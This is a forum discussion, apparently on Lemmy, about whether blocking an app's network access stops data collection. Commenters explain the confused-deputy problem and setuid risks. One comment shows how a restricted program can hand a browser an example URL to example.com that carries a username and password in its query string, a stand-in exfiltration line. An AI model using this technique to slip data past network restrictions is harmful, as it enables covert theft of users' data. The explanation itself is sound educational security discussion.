theres a bunch of customizastion apps (icon packs, launchers etc.) that look really cool but lowkey collect my data, but if I just turn off the apps network permissons (app info, mobile data usage, and then set allow network access to off) do I still need to worry about data collection? thank


I’m not really sure if it’s a problem on mobile, but even if network access is disabled for a process & its children, it may have access to processes that do have access.
As an example, open a firefox-based browser (not sure about chromium). Then, in a new terminal window, run the following command:
firefox lemmy.ml, substitutingfirefoxfor the name of the open browser. Lemmy.ml should now be open in a new tab in the original browser window.It doesn’t really matter if a program opens lemmy, but it can open any URL, like for example:
https://example.com/data_vacuum/upload?user=ferric_carcinization&password=password123&pronouns=they-them&favorite-language=rustI might be mistaken, but I think on Android you (as an app developer) can’t just launch things in specific other apps, and you can instead only launch a type of action but the user would be prompted to select an app to complete the action with (until the user chooses the default app for that type of action from that app).
Will these connections show up in the network logs? If so, then one can at least know if connections ate bring made and try to block it. I’d appreciate it if anyone could explain .
It will show up as coming from firefox. When you run the command with the browser already running, it tells the original browser process to open the tab, then exits. The restricted process never does any network I/O by itself.
You would have to know in advance all the domains the malicious program would access and block them, so realistically, no, at least not pre-emptively.
Thanks for that. This confirms my suspicion. I remember individually blocking so many donations when on Win10. Its impossible tip keep up with them all. I had a feeling that many of these domains just keep getting regard with new addresses every few days. Really frustrating.
This is… actually clever. Have you seen any incidents that involved the usage of this or is this common malware technique or something?
I’m not sure if this specifically is used, as it requires the browser to be already running. If not, the new browser instance is spawned as a child process to the malicious program, inheriting all of its restrictions.
In general, if you don’t have permission to do something yourself, it’s common to find someone who does and ask nicely (or maliciously) for them to do it on your behalf. This is called the confused deputy problem.
See also the security problems related to the setuid bit.
For example, sudo should be owned by root and have the setuid bit set. This means that every time you run sudo, it runs with the permissions of the root user. Now, sudo is typically strict about checking if you’re really allowed to run commands with elevated permissions, and only executes the command you give if it’s sure that ypu’re allowed to.
But, suppose that you could replace the call to the password cheking function with a call to exec. Now, your password is interpreted as a file path and the file it points to is run with the sudo process’ peemissions (root). Authentication has now been bypassed.
It was a made-up example, but I hope that it illustrates the point.
In the real world, buffer overflows can potentially write user-supplied data over something important, essentially giving you a chance of achieving something similar. (Incidentally, the Rust programming language practically eliminates this class of memory-related bugs.)